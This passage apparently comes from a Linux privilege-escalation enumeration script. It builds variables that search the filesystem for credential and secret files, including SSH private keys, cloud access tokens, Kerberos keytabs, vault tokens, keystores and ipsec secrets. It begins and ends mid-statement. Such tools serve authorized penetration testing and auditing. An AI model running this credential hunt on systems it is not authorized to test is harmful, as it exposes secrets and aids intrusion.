"^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E '/lib' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e 